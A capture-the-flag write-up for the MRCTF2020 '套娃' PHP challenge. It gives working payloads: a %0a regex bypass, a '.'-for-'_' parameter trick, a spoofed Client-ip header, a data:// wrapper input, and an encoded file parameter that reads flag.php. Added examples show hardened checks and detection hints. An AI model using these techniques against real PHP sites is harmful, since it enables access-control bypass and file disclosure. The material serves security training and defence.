BUUCTF [MRCTF2020]套娃
-
`!=` and `==` are loose comparisons; `!==` and `===` are their strict counterparts.
-
1. http://localhost/aaa/ (opens index.php inside aaa)
Result:
$_SERVER['QUERY_STRING'] = "";
$_SERVER['REQUEST_URI'] = "/aaa/";
$_SERVER['SCRIPT_NAME'] = "/aaa/index.php";
$_SERVER['PHP_SELF'] = "/aaa/index.php";
2. http://localhost/aaa/?p=222 (with a query string)
Result:
$_SERVER['QUERY_STRING'] = "p=222";
$_SERVER['REQUEST_URI'] = "/aaa/?p=222";
$_SERVER['SCRIPT_NAME'] = "/aaa/index.php";
$_SERVER['PHP_SELF'] = "/aaa/index.php";
3. http://localhost/aaa/index.php?p=222&q=333
Result:
$_SERVER['QUERY_STRING'] = "p=222&q=333";
$_SERVER['REQUEST_URI'] = "/aaa/index.php?p=222&q=333";
$_SERVER['SCRIPT_NAME'] = "/aaa/index.php";
$_SERVER['PHP_SELF'] = "/aaa/index.php";
From these examples:
$_SERVER["QUERY_STRING"]: the query string; as the examples show, this is whatever follows the `?`
$_SERVER["REQUEST_URI"]: everything after http://localhost, including the leading `/`
$_SERVER["SCRIPT_NAME"]: path of the current script, e.g. index.php
$_SERVER["PHP_SELF"]: file name of the script currently executing
-
A filter on `_` can be bypassed with `.` (PHP rewrites `.` in an incoming parameter name to `_` when it builds `$_GET`).
-
`%0a` bypasses the regex (in PCRE a `$` anchor also matches just before a trailing newline).
So the payload for the first part is: http://4bc5cdd7-d701-4c49-b9a7-d9368f0abd98.node4.buuoj.cn/?b.u.p.t=23333%0a
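The two PHP behaviours behind that payload, shown side by side with checks that do not have them. This is an added example, not code from the writeup or the challenge; the check functions, the literal `23333` and the parameter name are assumptions modelled on the payload above. It runs from the CLI (PHP 8+ for `str_contains`), no web server needed.

```php
<?php
// Added example (not from the original writeup, not the challenge's own source).
// (a) In PCRE, '$' also matches right before a trailing "\n", so a value that is
//     not identical to the literal can still satisfy an anchored regex.
function weakMatch(string $v): bool   { return preg_match('/^23333$/',  $v) === 1; }
// The D modifier (PCRE_DOLLAR_ENDONLY) makes '$' match only at the true end of the
// string; writing '\z' instead of '$' is equivalent.
function strictMatch(string $v): bool { return preg_match('/^23333$/D', $v) === 1; }

$withNewline = "23333\n";              // what ?b.u.p.t=23333%0a decodes to
var_dump($withNewline !== '23333');    // bool(true)  -- fails the strict comparison ...
var_dump(weakMatch($withNewline));     // bool(true)  -- ... yet passes the regex
var_dump(strictMatch($withNewline));   // bool(false) -- D closes that gap

// (b) When PHP builds $_GET (parse_str applies the same rule, so it is used here to
//     emulate a request offline), '.' and ' ' in a parameter NAME become '_'.
//     A filter that searches the raw $_SERVER['QUERY_STRING'] for '_' therefore never
//     sees the name the script later reads.
$rawQuery = 'b.u.p.t=23333';                                    // constructed query string
parse_str($rawQuery, $params);
var_dump(str_contains($rawQuery, '_'));                         // bool(false) -- raw-string filter misses it
var_dump(array_key_exists('b_u_p_t', $params));                 // bool(true)  -- but the script sees b_u_p_t

// A filter applied to the decoded parameter names checks the same thing the script uses.
function hasUnderscoreKey(array $params): bool {
    foreach (array_keys($params) as $k) {
        if (str_contains((string)$k, '_')) {
            return true;
        }
    }
    return false;
}
var_dump(hasUnderscoreKey($params));   // bool(true)
```

The practical rule for a defender: validate the decoded value with `===` against the expected literal (or anchor with `\z`/`D`), and validate parameter names after PHP has decoded them rather than by grepping the raw query string.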
The page source contains a block of JSFuck.
Decode the JSFuck first.
It's Merak again.
```php
<?php
error_reporting(0);
include 'takeip.php';
ini_set('open_basedir','.');
include 'flag.php';
if(isset($_POST['Merak'])){
    highlight_file(__FILE__);
    die();
}
function change($v){
    $v = base64_decode($v);                 // 1. base64-decode $v
    $re = '';
    for($i=0;$i<strlen($v);$i++){
        // 2. add 2*i to the ASCII code of the i-th byte of $v, convert the result back
        //    to a character and append it to $re
        $re .= chr ( ord ($v[$i]) + $i*2 );
    }
    return $re;
}
echo 'Local access only!'."<br/>";
$ip = getIp();            // this function usually only looks at the X-Forwarded-For and Client-ip headers
if($ip!='127.0.0.1')      // the IP must be 127.0.0.1
    echo "Sorry,you don't have permission! Your ip is :".$ip;
// file_get_contents($_GET['2333']) can be satisfied with the data:// wrapper
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day'){
    echo "Your REQUEST is:".change($_GET['file']);
    echo file_get_contents(change($_GET['file']));
}
?>
```
`file_get_contents($_GET['2333']) === 'todat is a happy day'` can be satisfied this way:
Reference: https://www.php.cn/manual/view/285.html
data://text/plain;base64,dG9kYXQgaXMgYSBoYXBweSBkYXk=
Based on the change function, a script to generate the payload:
```php
<?php
// change() as in the challenge source, kept for reference
function change($v){
    $v = base64_decode($v);
    $re = '';
    for($i=0;$i<strlen($v);$i++){
        $re .= chr ( ord ($v[$i]) + $i*2 );
    }
    return $re;
}
// inverse of the per-byte step of change(): subtract 2*i from each byte, so that
// change(base64_encode(changeRE($s))) gives back $s, the wanted payload
function changeRE($v){
    $re='';
    for($i=0;$i<strlen($v);$i++){
        $re .= chr ( ord ($v[$i]) - $i*2 );
    }
    return $re;
}
echo(base64_encode(changeRE('flag.php')));
?>
```
Note: both parameters are passed as GET parameters here; I tried POSTing them several times before I noticed.
file=ZmpdYSZmXGI=
Final payload:
```http
POST /secrettw.php?2333=data://text/plain;base64,dG9kYXQgaXMgYSBoYXBweSBkYXk=&file=ZmpdYSZmXGI= HTTP/1.1
Host: 4bc5cdd7-d701-4c49-b9a7-d9368f0abd98.node4.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Cache: no-cache
Origin: moz-extension://56944923-d8f9-4d5b-b169-ab8dceb2eced
Connection: close
Client-ip: 127.0.0.1
```
These three parameters are the ones I modified.
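The second stage rests on two trust decisions that the final request above exploits: an IP check that reads client-supplied headers, and a `file_get_contents()` that accepts any stream wrapper. The following is an added example, not the challenge's `takeip.php` or any code from the writeup; `getIpWeak()` is a constructed model of the header-based lookup the writeup describes, and the hardened counterparts, the sample `$_SERVER` array and the `data://` string are assumptions for the demonstration. It runs from the CLI on PHP 8+ with the default `allow_url_fopen=On`.

```php
<?php
// Added example (not from the original writeup or the challenge source).

// Weak: a getIp() in the style described above trusts whatever header the client sends.
function getIpWeak(array $server): string {
    if (!empty($server['HTTP_CLIENT_IP']))       { return $server['HTTP_CLIENT_IP']; }
    if (!empty($server['HTTP_X_FORWARDED_FOR'])) { return $server['HTTP_X_FORWARDED_FOR']; }
    return $server['REMOTE_ADDR'] ?? '';
}
// Hardened: only the transport-level peer address is trusted. If a reverse proxy sits
// in front, the proxy must overwrite (not append to) the forwarding header and the
// application should accept it only from the proxy's own address.
function getIpStrict(array $server): string {
    return $server['REMOTE_ADDR'] ?? '';
}

// Weak: any stream wrapper reaches file_get_contents, so data:// (or php://) input is read.
function readWeak(string $path): string|false {
    return @file_get_contents($path);
}
// Hardened: refuse wrapper syntax and NUL bytes, then resolve to a real file and require
// it to stay inside a fixed base directory.
function readStrict(string $path, string $base): string|false {
    if (str_contains($path, '://') || str_contains($path, "\0")) {
        return false;
    }
    $realBase = realpath($base);
    $real     = realpath($base . DIRECTORY_SEPARATOR . $path);
    if ($realBase === false || $real === false || !str_starts_with($real, $realBase . DIRECTORY_SEPARATOR)) {
        return false;
    }
    return file_get_contents($real);
}

// Constructed request: the real peer is not local, but a Client-ip header claims it is.
$fakeServer = ['REMOTE_ADDR' => '203.0.113.5', 'HTTP_CLIENT_IP' => '127.0.0.1'];
var_dump(getIpWeak($fakeServer) === '127.0.0.1');    // bool(true)  -- header spoof passes the check
var_dump(getIpStrict($fakeServer) === '127.0.0.1');  // bool(false) -- peer address does not

// Constructed input: the data:// string from the writeup.
$dataUrl = 'data://text/plain;base64,dG9kYXQgaXMgYSBoYXBweSBkYXk=';
var_dump(readWeak($dataUrl));                 // string(20) "todat is a happy day"
var_dump(readStrict($dataUrl, __DIR__));      // bool(false) -- wrapper syntax rejected before any I/O
```

Detection-wise, the tell in access logs is the combination seen in the final request: a `data://` or `php://` URL inside a query parameter plus a `Client-ip`/`X-Forwarded-For` value of `127.0.0.1` arriving from a non-local peer.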